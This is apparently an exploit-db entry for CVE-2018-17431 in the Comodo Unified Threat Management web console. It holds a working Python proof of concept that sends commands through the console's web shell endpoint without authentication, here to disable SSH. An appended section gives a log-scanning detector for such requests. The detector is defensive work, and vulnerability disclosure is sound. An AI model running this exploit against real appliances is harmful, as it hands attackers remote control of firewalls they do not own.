Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution

Published: 22 Sep 2020 00:00:00
Reported by: Milad Fadavvi
Type: exploitdb
Source: www.exploit-db.com

Comodo Unified Threat Mgmt Web Console 2.7.0-RCE, Exploit by Milad Fadavvi

Related

Reporter | Title | Published | Family
Circl | CVE-2018-17431 | 14 Nov 2024 06:07 | circl
CVE | CVE-2018-17431 | 29 Jan 2019 23:00 | cve
Cvelist | CVE-2018-17431 | 29 Jan 2019 23:00 | cvelist
GithubExploit | Exploit for Improper Authentication in Comodo Unified_Threat_Management_Firewall | 8 Dec 2018 07:47 | githubexploit
Nuclei | Comodo Unified Threat Management Web Console - Remote Code Execution | 1 Jun 2026 05:38 | nuclei
NVD | CVE-2018-17431 | 30 Jan 2019 15:29 | nvd
OSV | CVE-2018-17431 | 30 Jan 2019 15:29 | osv
Packet Storm | Comodo Unified Threat Management Web Console 2.7.0 Remote Code Execution | 22 Sep 2020 00:00 | packetstorm
Prion | Authentication flaw | 30 Jan 2019 15:29 | prion
Positive Technologies | PT-2019-9479 · Comodo · Comodo Utm Firewall | 29 Jan 2019 00:00 | ptsecurity

# Exploit Title: Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution
# Date: 2018-08-15
# Exploit Author: Milad Fadavvi
# Author's LinkedIn: https://www.linkedin.com/in/fadavvi/
# Vendor Homepage: https://www.comodo.com/
# Version: Releases before 2.7.0 & 1.5.0 
# Tested on: Windows=Firefox/chrome - Kali=firefox
# PoC & other infos: https://github.com/Fadavvi/CVE-2018-17431-PoC
# CVE : CVE-2018-17431
# CVE-details: https://nvd.nist.gov/vuln/detail/CVE-2018-17431
# CVSS 3 score: 9.8 

import requests

def RndInt(Lenght):
    from random import choice
    from string import digits

    RandonInt = ''.join([choice(digits) for n in range(Lenght)])
    return str(RandonInt)

if __name__ == "__main__":

    IP = input("IP: ")
    Port = input("Port: ")

    Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a' ## Disable SSH
    '''For more info about the command, read the manual for the specific version of Comodo UTM and
       the exploit PoC (https://github.com/Fadavvi/CVE-2018-17431-PoC)
     '''

    BaseURL = "https://" + IP + ":" + Port + "/manage/webshell/u?s=" + RndInt(1) + "&w=" + RndInt(3) +"&h=" + RndInt(2)
    BaseNComdURL = BaseURL + "&k=" + Command
    LastPart = "&l=" + RndInt(2) +"&_=" + RndInt(13) 
    FullURL = BaseNComdURL + LastPart
    AddetionalEnter = BaseURL + "&k=%0a" + LastPart

    try:
        FirstResponse = requests.get(FullURL).text
    except:
        print('\nExploit failed due HTTP Error. Check given URL and Port!\n')
        exit(1)
    
    SecondResponse = requests.get(AddetionalEnter).text
    if SecondResponse.find("Configuration has been altered") == -1:
        print("\nExploit Failed!\n")
        exit(1)
    else:
        print("\nOK! Command Ran!\n")
    exit(0)
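
Added detection example (not part of the original exploit-db entry or the author's PoC): a log scan that flags requests carrying keystrokes to the /manage/webshell/u endpoint used above and decodes what was typed. The log format, the function name find_webshell_keystrokes and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint and the k= (keystrokes) parameter are taken from the PoC above.
WEBSHELL_PATH = "/manage/webshell/u"

# Assumption: "combined"-style access log lines from a proxy or sensor in
# front of the console; the appliance's own log format is not on this page.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '198.51.100.7 - - [22/Sep/2020:10:01:02 +0000] "GET /manage/webshell/u?s=5&w=123&h=45&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=12&_=1600768862000 HTTP/1.1" 200 58',
    '198.51.100.7 - - [22/Sep/2020:10:01:03 +0000] "GET /manage/webshell/u?s=5&w=123&h=45&k=%0a&l=12&_=1600768863000 HTTP/1.1" 200 91',
    '192.0.2.10 - - [22/Sep/2020:10:02:00 +0000] "GET /favicon.ico HTTP/1.1" 200 4312',
    'this line is not in access-log format and is skipped',
]


def find_webshell_keystrokes(lines):
    """Return one finding per request that sends k= to the web shell endpoint."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        # Normalise so encoded or doubled-slash forms of the path still match.
        path = re.sub(r"/+", "/", unquote(url.path)).rstrip("/")
        params = parse_qs(url.query, keep_blank_values=True)
        if path != WEBSHELL_PATH or "k" not in params:
            continue
        # parse_qs has already percent-decoded the value; %0a is the Enter key.
        typed = [t for t in re.split(r"[\r\n]+", params["k"][0]) if t]
        findings.append({"ip": m["ip"], "time": m["ts"],
                         "status": int(m["status"]), "typed": typed})
    return findings


if __name__ == "__main__":
    for f in find_webshell_keystrokes(SAMPLE_LOG):
        print(f["time"], f["ip"], f["status"], f["typed"] or "<Enter only>")
```

The PoC sends these requests without logging in, so a hit from any address that is not a known administrator workstation deserves a look at what the decoded keystrokes changed.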
